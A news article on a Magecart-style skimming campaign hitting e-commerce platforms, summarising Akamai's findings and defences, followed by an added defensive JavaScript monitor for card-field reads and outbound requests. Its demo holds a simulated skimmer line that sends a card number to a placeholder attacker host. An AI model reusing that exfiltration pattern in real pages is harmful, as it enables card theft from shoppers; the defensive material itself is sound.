New e-commerce exploit affects WooCommerce, Shopify, Magento

In a major hack, e-commerce websites were exploited to steal users’ credit card information and to extend the attack to other websites.

These hacking attacks are known as Magecart-style skimmers and are spreading across multiple e-commerce platforms worldwide.

Attackers are targeting various e-commerce platforms:

  • Magento
  • Shopify
  • WooCommerce
  • WordPress

What does the attack do?

When infecting a website, attackers have two goals:

1. Use the site to spread to other sites

2. Steal personal information like credit card details from customers of the infected website.

Detecting an infection is difficult because the code placed on a website is encrypted and sometimes disguised as Google Tag or Facebook Pixel code.

Image: fake Google Analytics code containing the encrypted URL of an exploited site (screenshot: Akamai)

In reality, the code targets input forms for credit card information.

It also serves as an intermediary to launch attacks on behalf of the attacker, thereby obscuring the true source of the attacks.

Magecart style skimmer

A Magecart attack is an attack that takes place via an existing vulnerability in the e-commerce platform itself.

With WordPress and WooCommerce, it could be a vulnerability in a theme or plugin.

With Shopify, it could be an existing vulnerability in the platform itself.

In all cases, the attackers exploit vulnerabilities in the platform that the e-commerce websites use.

This is not a single vulnerability that can be easily fixed. There is a wide range of them.

Akamai’s report states:

“Before the campaign can start in earnest, the attackers look for vulnerable websites to act as ‘hosts’ for the malicious code that is later used for the web-skimming attack.

…Although it is unclear how these websites are attacked, based on our recent investigations into similar, previous campaigns, the attackers will typically be looking for vulnerabilities in the digital commerce platform of the attacked websites (such as Magento, WooCommerce, WordPress, Shopify, etc.) or in vulnerable third party services used by the website.”

Recommended action

Akamai encourages all e-commerce users to secure their websites. This means you need to ensure that all third party apps and plugins are up to date and that the platform itself is running the latest version.

They also recommend using a web application firewall (WAF), which detects and blocks attackers as they probe a website looking for vulnerabilities.

Users of platforms like WordPress have several security solutions at their disposal, with Sucuri Security (website hardening) and WordFence (WAF) being popular and trusted ones.

Akamai recommends:

“…the complexity, deployment, agility, and distribution of today’s web application environments—and the various methods attackers can use to install web skimmers—need more dedicated security solutions that provide visibility into the behavior of scripts running in the browser.

Defense against client-side attacks

A suitable solution must be closer to where the actual attack on the clients takes place. It should be able to successfully identify attempted reads from sensitive input fields and data exfiltration (we used Akamai Page Integrity Manager in our tests).

We recommend that these events are properly recorded to enable fast and effective mitigation.”
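The two behaviours the quoted recommendation says a client-side solution must identify, scripts reading sensitive input fields and data leaving the page, can be observed from inside the page itself, which also covers the earlier point that a skimmer can hide behind what looks like Google Tag or Facebook Pixel code: a script is judged by what it does, not by what it is named. The following is an added example, not code from the article and not Akamai Page Integrity Manager: a small in-page monitor that wraps fetch(), navigator.sendBeacon() and the HTMLInputElement value getter, flags reads of card fields (recognised by their cc-* autocomplete attribute) and outbound requests to hosts outside a site allowlist, and carries a constructed stand-in window so it runs under Node. The host names, field names, allowlist and the simulated skimmer in the demo are all invented for this example.

```javascript
// Added example (not the article's or Akamai's code): a minimal client-side
// integrity monitor for the two behaviours the quoted recommendation names,
// script reads of sensitive input fields and exfiltration to unknown hosts.

// Card-related autocomplete tokens from the HTML standard mark a field as sensitive.
const SENSITIVE_AUTOCOMPLETE = new Set(['cc-number', 'cc-csc', 'cc-exp', 'cc-name']);

// Policy engine: decides what to flag and collects alerts. `allowedHosts` is the
// site's allowlist of third-party hosts; `report` is an optional alert sink.
function createMonitor({ allowedHosts, report }) {
  const alerts = [];
  const emit = (alert) => { alerts.push(alert); if (report) report(alert); };

  // Resolve a request target against the page origin and classify it.
  function inspectRequest(url, pageOrigin) {
    const pageHost = new URL(pageOrigin).hostname;
    let host = null;
    try { host = new URL(String(url), pageOrigin).hostname; } catch (_) { /* unparsable: treat as unknown */ }
    if (host === pageHost || (host !== null && allowedHosts.has(host))) return { blocked: false, host };
    emit({ kind: 'exfil-attempt', host, url: String(url) });
    return { blocked: true, host };
  }

  // Record a script reading an input; only cc-* fields produce an alert.
  function recordFieldRead(field, stack) {
    if (!SENSITIVE_AUTOCOMPLETE.has(field.autocomplete)) return false;
    emit({ kind: 'sensitive-read', field: field.name || field.id, stack });
    return true;
  }

  return { inspectRequest, recordFieldRead, alerts };
}

// Hook a window object. Must run before any third-party script on the page.
function installHooks(win, monitor) {
  const origin = win.location.origin;

  // Outbound channels: fetch() and navigator.sendBeacon().
  const origFetch = win.fetch;
  win.fetch = function (input, init) {
    const url = typeof input === 'string' ? input : (input.url || String(input));
    if (monitor.inspectRequest(url, origin).blocked) {
      return Promise.reject(new Error('blocked by integrity monitor: ' + url));
    }
    return origFetch.call(win, input, init);
  };
  if (win.navigator && typeof win.navigator.sendBeacon === 'function') {
    const origBeacon = win.navigator.sendBeacon.bind(win.navigator);
    win.navigator.sendBeacon = (url, data) =>
      monitor.inspectRequest(url, origin).blocked ? false : origBeacon(url, data);
  }

  // Input reads: wrap the prototype's `value` getter so every read is attributed
  // to a call stack (which reveals the script that performed it).
  const proto = win.HTMLInputElement.prototype;
  const desc = Object.getOwnPropertyDescriptor(proto, 'value');
  Object.defineProperty(proto, 'value', {
    configurable: true,
    enumerable: desc.enumerable,
    set: desc.set,
    get() {
      monitor.recordFieldRead(this, new Error().stack);
      return desc.get.call(this);
    },
  });
}

// Constructed stand-in for a browser window so the example runs under Node.
function makeFakeWindow() {
  class FakeInput {
    constructor(name, autocomplete, value) {
      this.name = name; this.autocomplete = autocomplete; this.stored = value;
    }
    get value() { return this.stored; }
    set value(v) { this.stored = v; }
  }
  const sent = [];
  return {
    location: { origin: 'https://shop.example' },
    fetch: (input) => { sent.push(String(input)); return Promise.resolve({ ok: true }); },
    navigator: { sendBeacon: (url) => { sent.push(String(url)); return true; } },
    HTMLInputElement: FakeInput,
    sent,
  };
}

// Demo: a checkout page with one allowlisted tag host, then a simulated skimmer
// that reads the card field and posts it to an unknown host (placeholder names).
function runDemo() {
  const win = makeFakeWindow();
  const monitor = createMonitor({ allowedHosts: new Set(['tags.allowlisted.example']) });
  installHooks(win, monitor);
  const card = new win.HTMLInputElement('card', 'cc-number', '4111111111111111');
  const email = new win.HTMLInputElement('email', 'email', 'buyer@example.com');
  const read = card.value;                                   // flagged: cc-number field
  void email.value;                                          // not flagged: ordinary field
  win.fetch('https://collect.attacker-placeholder.invalid/?d=' + read).catch(() => {}); // flagged, blocked
  win.navigator.sendBeacon('/api/checkout', '{}');           // same-site: allowed
  win.fetch('https://tags.allowlisted.example/tag.js');      // allowlisted: allowed
  return { alerts: monitor.alerts, sent: win.sent };
}
```

Two points for anyone adapting this: the hooks only see channels they wrap, so XMLHttpRequest, image requests and form submissions need the same treatment, and the alerts are only useful if they reach a server-side log, which is the recording the quoted text asks for. The `stack` captured on each sensitive read is what lets an analyst tell a legitimate checkout script from a foreign one.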

See the original report for more details:

New Magecart style campaign that abuses legitimate websites to attack others